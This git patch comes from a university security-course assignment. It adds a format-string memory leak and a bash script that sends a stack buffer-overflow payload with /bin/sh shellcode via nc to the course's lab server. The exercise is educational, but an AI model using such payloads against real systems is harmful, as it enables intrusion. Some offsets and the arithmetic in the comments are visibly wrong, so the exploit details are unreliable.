From c333677b7ac94a5ff1f90c486c243b0cfa371a17 Mon Sep 17 00:00:00 2001 From: Mart Lubbers Date: Thu, 12 Mar 2015 12:48:08 +0100 Subject: [PATCH] poging --- .../exercise2 | 27 ++++++++----------- .../exercise2e.sh | 14 ++++++++++ 2 files changed, 25 insertions(+), 16 deletions(-) create mode 100644 ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh diff --git a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2 b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2 index 95b7f60..9c98cf3 100644 --- a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2 +++ b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2 @@ -1,12 +1,14 @@ -a. The buffer is 104 characters long. When you input 105 a's the last a will -be garbled. +a) +The buffer is probably 104 characters wide. All characters over 104 will not be +echoed. -b. "%lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx" -The memory outputted is this: -7ffff7ff805b +b,c) +printf "%20s\n" | sed 's/ /%lx /g' | nc hackme.cs.ru.nl 2266 + +Memory: +7ffff7ff8050 7ffff7dd8de0 fbad2088 -786c2520786c2520 20786c2520786c25 20786c2520786c25 20786c2520786c25 @@ -19,15 +21,8 @@ fbad2088 20786c2520786c25 20786c2520786c25 20786c2520786c25 -786c25 -1 +7fffffffeb00 saved frame pointer +4004c1 return address +1 return value 7fffffffeb30 7fffffffebc0 -4006a9 -0 -100400530 - -c. Frame pointer: 7fffffffeb30 or 7fffffffebc0 - return address: 4006a9 - -d. 17 words of 8 bytes therefore 136 diff --git a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh new file mode 100644 index 0000000..38ea879 --- /dev/null +++ b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh @@ -0,0 +1,14 @@ +# Buffer is 104 bytes +# Shell code is 30 bytes so we need to fill 73 bytes +# Then we need to skip the sfp and fix the return address to our address + +#fillers=$(printf "%73s") +#fillers="a\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f" +fillers="\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f" +shellcode="\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05" +sfpfiller="\x01\x01\x01\x01\x01\x01" +# Return value is +# 0x7ffff7dd8de0 - 73 = 7ffff7dd8e29 - +# The buffer +returnvalue="\x7f\xff\xf7\xdd\xeb\x30" +cat <(echo -e "${fillers}${shellcode}${sfpfiller}${returnvalue}\n") - | nc hackme.cs.ru.nl 2266 -- 2.20.1